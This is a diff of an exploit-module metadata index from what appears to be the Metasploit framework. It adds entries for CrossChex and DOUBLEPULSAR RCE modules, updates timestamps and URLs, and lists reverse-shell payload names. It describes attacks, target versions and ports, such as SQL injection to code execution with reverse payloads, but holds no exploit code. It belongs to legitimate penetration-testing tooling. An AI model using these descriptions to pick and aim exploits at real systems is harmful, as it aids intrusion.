+    "description": "This module will execute an arbitrary payload on an \"ESEL\" server used by the\n          AIS logistic software. The server typically listens on port 5099 without TLS.\n          There could also be server listening on 5100 with TLS but the port 5099 is\n          usually always open.\n          The login process is vulnerable to an SQL Injection. Usually a MSSQL Server\n          with the 'sa' user is in place.\n\n          This module was verified on version 67 but it should also run on lower versions.\n          An fixed version was created by AIS in September 2017. However most systems\n          have not been updated.\n\n          In regard to the payload, unless there is a closed port in the web server,\n          you dont want to use any \"bind\" payload. You want a \"reverse\" payload,\n          probably to your port 80 or to any other outbound port allowed on the firewall.\n\n          Currently, one delivery method is supported\n\n          This method takes advantage of the Command Stager subsystem. This allows using\n          various techniques, such as using a TFTP server, to send the executable. By default\n          the Command Stager uses 'wcsript.exe' to generate the executable on the target.\n\n          NOTE: This module will leave a payload executable on the target system when the\n          attack is finished.",
    "references": [
      "CVE-2019-10123"
    ],
@@ -130877,7 +131566,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-04-25 18:24:26 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/exploits/windows/misc/ais_esel_server_rce.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/ais_esel_server_rce",
@@ -131923,6 +132612,50 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/misc/crosschex_device_bof": {
+    "name": "Anviz CrossChex Buffer Overflow",
+    "fullname": "exploit/windows/misc/crosschex_device_bof",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-11-28",
+    "type": "exploit",
+    "author": [
+      "Luis Catarino <lcatarino@protonmail.com>",
+      "Pedro Rodrigues <pedrosousarodrigues@protonmail.com>",
+      "agalway-r7",
+      "adfoster-r7"
+    ],
+    "description": "Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\n          triggering a stack buffer overflow.",
+    "references": [
+      "CVE-2019-12518",
+      "URL-https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html",
+      "EDB-47734"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Crosschex Standard x86 <= V4.3.12"
+    ],
+    "mod_time": "2020-03-05 14:48:37 +0000",
+    "path": "/modules/exploits/windows/misc/crosschex_device_bof.rb",
+    "is_install_path": true,
+    "ref_name": "windows/misc/crosschex_device_bof",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/misc/disk_savvy_adm": {
    "name": "Disk Savvy Enterprise v10.4.18",
    "fullname": "exploit/windows/misc/disk_savvy_adm",
@@ -132747,7 +133480,7 @@
      "CVE-2012-0124",
      "OSVDB-80105",
      "BID-52431",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124"
+      "URL-https://blog.rapid7.com/2012/07/06/an-example-of-egghunting-to-exploit-cve-2012-0124"
    ],
    "platform": "Windows",
    "arch": "",
@@ -132762,7 +133495,7 @@
      "HP Data Protector Express 6.0.00.11974 / Windows XP SP3",
      "HP Data Protector Express 5.0.00.59287 / Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/misc/hp_dataprotector_new_folder.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/hp_dataprotector_new_folder",
@@ -136091,7 +136824,7 @@
    "references": [
      "CVE-2012-4959",
      "OSVDB-87573",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
+      "URL-https://blog.rapid7.com/2012/11/16/nfr-agent-buffer-vulnerabilites-cve-2012-4959"
    ],
    "platform": "Windows",
    "arch": "",
@@ -136114,7 +136847,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb",
    "is_install_path": true,
    "ref_name": "windows/novell/file_reporter_fsfui_upload",
@@ -137139,6 +137872,63 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/rdp/rdp_doublepulsar_rce": {
+    "name": "RDP DOUBLEPULSAR Remote Code Execution",
+    "fullname": "exploit/windows/rdp/rdp_doublepulsar_rce",
+    "aliases": [
+
+    ],
+    "rank": 500,
+    "disclosure_date": "2017-04-14",
+    "type": "exploit",
+    "author": [
+      "Equation Group",
+      "Shadow Brokers",
+      "Luke Jennings",
+      "wvu <wvu@metasploit.com>",
+      "Tom Sellers",
+      "Spencer McIntyre"
+    ],
+    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for RDP.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
+    "references": [
+      "URL-https://github.com/countercept/doublepulsar-detection-script"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 3389,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Execute payload (x64)",
+      "Neutralize implant"
+    ],
+    "mod_time": "2020-01-29 13:16:02 +0000",
+    "path": "/modules/exploits/windows/rdp/rdp_doublepulsar_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/rdp/rdp_doublepulsar_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "DOUBLEPULSAR"
+      ],
+      "RelatedModules": [
+        "exploit/windows/smb/smb_doublepulsar_rce"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/scada/abb_wserver_exec": {
    "name": "ABB MicroSCADA wserver.exe Remote Code Execution",
    "fullname": "exploit/windows/scada/abb_wserver_exec",
@@ -138504,7 +139294,7 @@
    "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n        exists in the service BKBCopyD.exe when handling specially crafted packets. This module has\n        been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.",
    "references": [
      "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
      "CVE-2014-0784"
    ],
    "platform": "Windows",
@@ -138519,7 +139309,7 @@
    "targets": [
      "Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/yokogawa_bkbcopyd_bof",
@@ -138546,7 +139336,7 @@
    "description": "This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability\n        exists in the BKESimmgr.exe service when handling specially crafted packets, due to an\n        insecure usage of memcpy, using attacker controlled data as the size count. This module\n        has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows\n        2003 SP2.",
    "references": [
      "CVE-2014-0782",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities",
      "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf"
    ],
    "platform": "Windows",
@@ -138561,7 +139351,7 @@
    "targets": [
      "Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/yokogawa_bkesimmgr_bof",
@@ -138590,7 +139380,7 @@
      "CVE-2014-3888",
      "URL-http://jvn.jp/vu/JVNVU95045914/index.html",
      "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow"
+      "URL-https://blog.rapid7.com/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow"
    ],
    "platform": "Windows",
    "arch": "",
@@ -138604,7 +139394,7 @@
    "targets": [
      "Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3"
    ],
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/yokogawa_bkfsim_vhfd",
@@ -138631,7 +139421,7 @@
    "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n        exists in the service BKHOdeq.exe when handling specially crafted packets. This module has\n        been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows\n        2003 SP2.",
    "references": [
      "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
+      "URL-https://blog.rapid7.com/2014/03/10/yokogawa-centum-cs3000-vulnerabilities",
      "CVE-2014-0783"
    ],
    "platform": "Windows",
@@ -138646,7 +139436,7 @@
    "targets": [
      "Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
    "path": "/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/scada/yokogawa_bkhodeq_bof",
@@ -138780,78 +139570,6 @@
    },
    "needs_cleanup": null
  },
-  "exploit_windows/smb/doublepulsar_rce": {
-    "name": "DOUBLEPULSAR Payload Execution and Neutralization",
-    "fullname": "exploit/windows/smb/doublepulsar_rce",
-    "aliases": [
-
-    ],
-    "rank": 500,
-    "disclosure_date": "2017-04-14",
-    "type": "exploit",
-    "author": [
-      "Equation Group",
-      "Shadow Brokers",
-      "zerosum0x0",
-      "Luke Jennings",
-      "wvu <wvu@metasploit.com>",
-      "Jacob Robles"
-    ],
-    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
-    "references": [
-      "MSB-MS17-010",
-      "CVE-2017-0143",
-      "CVE-2017-0144",
-      "CVE-2017-0145",
-      "CVE-2017-0146",
-      "CVE-2017-0147",
-      "CVE-2017-0148",
-      "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
-      "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
-      "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
-      "URL-https://github.com/countercept/doublepulsar-detection-script",
-      "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
-      "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"
-    ],
-    "platform": "Windows",
-    "arch": "x64",
-    "rport": 445,
-    "autofilter_ports": [
-      139,
-      445
-    ],
-    "autofilter_services": [
-      "netbios-ssn",
-      "microsoft-ds"
-    ],
-    "targets": [
-      "Execute payload",
-      "Neutralize implant"
-    ],
-    "mod_time": "2020-01-22 16:37:36 +0000",
-    "path": "/modules/exploits/windows/smb/doublepulsar_rce.rb",
-    "is_install_path": true,
-    "ref_name": "windows/smb/doublepulsar_rce",
-    "check": true,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "AKA": [
-        "DOUBLEPULSAR"
-      ],
-      "RelatedModules": [
-        "auxiliary/scanner/smb/smb_ms17_010",
-        "exploit/windows/smb/ms17_010_eternalblue"
-      ],
-      "Stability": [
-        "crash-os-down"
-      ],
-      "Reliability": [
-        "repeatable-session"
-      ]
-    },
-    "needs_cleanup": null
-  },
  "exploit_windows/smb/generic_smb_dll_injection": {
    "name": "Generic DLL Injection From Shared Resource",
    "fullname": "exploit/windows/smb/generic_smb_dll_injection",
@@ -139874,7 +140592,7 @@
      "Shadow Brokers",
      "thelightcosine"
    ],
-    "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of\n        the FuzzBunch toolkit released by Shadow Brokers.\n\n        There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n        is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n        DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n        is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n        completed in srvnet!SrvNetWskReceiveComplete.\n\n        This exploit, like the original may not trigger 100% of the time, and should be\n        run continuously until triggered. It seems like the pool will get hot streaks\n        and need a cool down period before the shells rain in again.\n\n        The module will attempt to use Anonymous login, by default, to authenticate to perform the\n        exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n        those instead.\n\n        On some systems, this module may cause system instability and crashes, such as a BSOD or\n        a reboot. This may be more likely with some payloads.",
+    "description": "This module is a port of the Equation Group ETERNALBLUE exploit, part of\n          the FuzzBunch toolkit released by Shadow Brokers.\n\n          There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n          is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n          DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n          is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n          completed in srvnet!SrvNetWskReceiveComplete.\n\n          This exploit, like the original may not trigger 100% of the time, and should be\n          run continuously until triggered. It seems like the pool will get hot streaks\n          and need a cool down period before the shells rain in again.\n\n          The module will attempt to use Anonymous login, by default, to authenticate to perform the\n          exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n          those instead.\n\n          On some systems, this module may cause system instability and crashes, such as a BSOD or\n          a reboot. This may be more likely with some payloads.",
    "references": [
      "MSB-MS17-010",
      "CVE-2017-0143",
@@ -139897,7 +140615,7 @@
    "targets": [
      "Windows 7 and Server 2008 R2 (x64) All Service Packs"
    ],
-    "mod_time": "2019-10-30 22:20:36 +0000",
+    "mod_time": "2020-03-09 09:22:01 +0000",
    "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
    "is_install_path": true,
    "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -140205,6 +140923,78 @@
    },
    "needs_cleanup": null
  },
+  "exploit_windows/smb/smb_doublepulsar_rce": {
+    "name": "SMB DOUBLEPULSAR Remote Code Execution",
+    "fullname": "exploit/windows/smb/smb_doublepulsar_rce",
+    "aliases": [
+      "exploit/windows/smb/doublepulsar_rce"
+    ],
+    "rank": 500,
+    "disclosure_date": "2017-04-14",
+    "type": "exploit",
+    "author": [
+      "Equation Group",
+      "Shadow Brokers",
+      "zerosum0x0",
+      "Luke Jennings",
+      "wvu <wvu@metasploit.com>",
+      "Jacob Robles"
+    ],
+    "description": "This module executes a Metasploit payload against the Equation Group's\n        DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n        While this module primarily performs code execution against the implant,\n        the \"Neutralize implant\" target allows you to disable the implant.",
+    "references": [
+      "MSB-MS17-010",
+      "CVE-2017-0143",
+      "CVE-2017-0144",
+      "CVE-2017-0145",
+      "CVE-2017-0146",
+      "CVE-2017-0147",
+      "CVE-2017-0148",
+      "URL-https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html",
+      "URL-https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/",
+      "URL-https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/",
+      "URL-https://github.com/countercept/doublepulsar-detection-script",
+      "URL-https://github.com/countercept/doublepulsar-c2-traffic-decryptor",
+      "URL-https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1"
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": [
+      "Execute payload (x64)",
+      "Neutralize implant"
+    ],
+    "mod_time": "2020-02-03 11:19:20 +0000",
+    "path": "/modules/exploits/windows/smb/smb_doublepulsar_rce.rb",
+    "is_install_path": true,
+    "ref_name": "windows/smb/smb_doublepulsar_rce",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "DOUBLEPULSAR"
+      ],
+      "RelatedModules": [
+        "auxiliary/scanner/smb/smb_ms17_010",
+        "exploit/windows/smb/ms17_010_eternalblue"
+      ],
+      "Stability": [
+        "crash-os-down"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "needs_cleanup": null
+  },
  "exploit_windows/smb/smb_relay": {
    "name": "MS08-068 Microsoft Windows SMB Relay Code Execution",
    "fullname": "exploit/windows/smb/smb_relay",
@@ -141018,7 +141808,7 @@
    "author": [
      "MC <mc@metasploit.com>"
    ],
-    "description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n        versions prior to 5.0.7. By sending an overly long string, an attacker can\n        overwrite the buffer and control program execution.",
+    "description": "This module exploits a stack buffer overflow in GoodTech Systems Telnet Server\n          versions prior to 5.0.7. By sending an overly long string, an attacker can\n          overwrite the buffer and control program execution.",
    "references": [
      "CVE-2005-0768",
      "OSVDB-14806",
@@ -141037,7 +141827,7 @@
      "Windows 2000 Pro English All",
      "Windows XP Pro SP0/SP1 English"
    ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-03-05 14:48:37 +0000",
    "path": "/modules/exploits/windows/telnet/goodtech_telnet.rb",
    "is_install_path": true,
    "ref_name": "windows/telnet/goodtech_telnet",
@@ -142698,7 +143488,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_http",
@@ -142733,7 +143523,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_https",
@@ -142768,7 +143558,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp",
@@ -142836,7 +143626,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -142871,7 +143661,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -142906,7 +143696,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-21 12:40:27 +0000",
+    "mod_time": "2020-03-05 10:11:26 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -144078,7 +144868,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-01-03 18:43:51 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_busybox_telnetd",
@@ -144111,7 +144901,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_inetd",
@@ -144180,7 +144970,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-01-14 17:34:47 +0000",
+    "mod_time": "2020-02-16 12:11:28 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_lua",
@@ -144215,7 +145005,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat",
@@ -144248,7 +145038,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat_gaping",
@@ -144281,7 +145071,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat_gaping_ipv6",
@@ -144348,7 +145138,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_perl",
@@ -144382,7 +145172,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_perl_ipv6",
@@ -144403,7 +145193,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Continually listen for a connection and spawn a command shell via R",
    "references": [
@@ -144415,7 +145205,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-08-28 05:30:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_r.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_r",
@@ -144448,7 +145238,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_ruby",
@@ -144481,7 +145271,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_ruby_ipv6",
@@ -144514,7 +145304,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_socat_udp",
@@ -144614,7 +145404,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/generic.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/generic",
@@ -144746,7 +145536,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse",
@@ -144814,7 +145604,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-07-10 18:34:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash",
@@ -144835,7 +145625,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Creates an interactive shell via mkfifo and telnet.\n        This method works on Debian and other systems compiled\n        without /dev/tcp support. This module uses the '-z'\n        option included on some systems to encrypt using SSL.",
    "references": [
@@ -144847,7 +145637,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-05-15 20:50:30 +0000",
+    "mod_time": "2019-06-25 20:42:35 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash_telnet_ssl",
@@ -144881,7 +145671,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2019-05-24 16:33:44 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash_udp",
@@ -144983,7 +145773,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_lua",
@@ -145051,7 +145841,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-08-23 18:00:02 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_netcat.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_netcat",
@@ -145084,7 +145874,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2018-08-23 18:00:02 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_netcat_gaping",
@@ -145150,7 +145940,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_openssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_openssl",
@@ -145183,7 +145973,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-10-13 17:04:00 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_perl",
@@ -145204,7 +145994,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
    ],
    "description": "Creates an interactive shell via perl, uses SSL",
    "references": [
@@ -145216,7 +146006,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-21 09:17:51 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_perl_ssl",
@@ -145237,7 +146027,7 @@
    "disclosure_date": null,
    "type": "payload",
    "author": [
-      "RageLtMan"
+      "RageLtMan <rageltman@sempervictus>"
